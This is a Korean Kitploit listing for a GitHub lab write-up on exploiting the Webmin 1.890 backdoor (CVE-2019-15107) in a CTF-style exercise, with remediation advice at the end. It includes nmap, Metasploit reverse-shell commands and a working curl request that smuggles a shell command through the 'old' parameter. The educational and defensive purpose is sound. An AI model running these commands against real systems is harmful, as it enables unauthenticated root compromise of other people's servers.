Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — 연구 목표: Webmin 버전 1.890(CVE-2019-15107)의 원격 코드 실행(RCE) 취약점에 대한 종합적인 분석 및 성공적인 악용을 수행하여 궁극적으로 대상 시스템에 대한 완전한 제어 권한을 획득하는 것. | Kitploit
도구/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Project-Exploitation-of-Webmin-Authentication-Vulnerability

연구 목표: Webmin 버전 1.890(CVE-2019-15107)의 원격 코드 실행(RCE) 취약점에 대한 종합적인 분석 및 성공적인 악용을 수행하여 궁극적으로 대상 시스템에 대한 완전한 제어 권한을 획득하는 것.

저장소 보기
1년 전아직 검토되지 않음

연구 목표: Webmin 1.890 버전의 원격 코드 실행(RCE) 취약점(CVE-2019-15107)에 대한 포괄적인 분석 및 성공적인 익스플로잇을 수행하여, 최종적으로 대상 시스템에 대한 완전한 제어권을 획득하는 것.

방법론:

초기 정찰:

Nmap을 사용한 네트워크 스캔 수행:

bash nmap -sV -sC -A -p- 10.201.105.185 포트 10000에서 실행 중인 Webmin 1.890 서비스 식별

취약점 분석:

password_change.cgi의 취약점 메커니즘 조사

인증 없이 임의 명령어 실행 가능성 확인

익스플로잇:

두 가지 공격 벡터 구현:

Metasploit 프레임워크 사용:

bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit curl을 통한 수동 익스플로잇:

bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" 사후 익스플로잇:

대화형 루트 셸 획득

파일 시스템 분석 수행

플래그 파일 발견:

bash /home/dark/user.txt /root/root.txt 결과:

CVE-2019-15107 취약점 성공적으로 익스플로잇

시스템에서 완전한 루트 권한 획득

적시 소프트웨어 업데이트의 중요성 입증

기술적 결론:

"old" 매개변수 주입을 통한 임의 명령어 실행 허용

인증 검사 부재로 인해 특히 위험

버전 1.890에는 이후 릴리스에서 패치된 백도어 포함

보안 권장 사항:

현재 Webmin 버전으로 즉시 업그레이드

IP별 관리 패널 접근 제한

웹 애플리케이션 정기적인 보안 감사

추가 연구 방향:

기타 Webmin 취약점 분석

Metasploit 없이 사용자 정의 익스플로잇 개발

침해 시스템에서의 지속 기술 조사

본 사례 연구는 배포된 소프트웨어에서 적시 시스템 업데이트의 중요성과 지속적인 취약점 모니터링의 필요성을 입증합니다. 이 연구는 기본적인 보안 원칙을 강조하면서 현대 웹 애플리케이션 익스플로잇 기술에 대한 실용적인 통찰력을 제공합니다.

도구 다운로드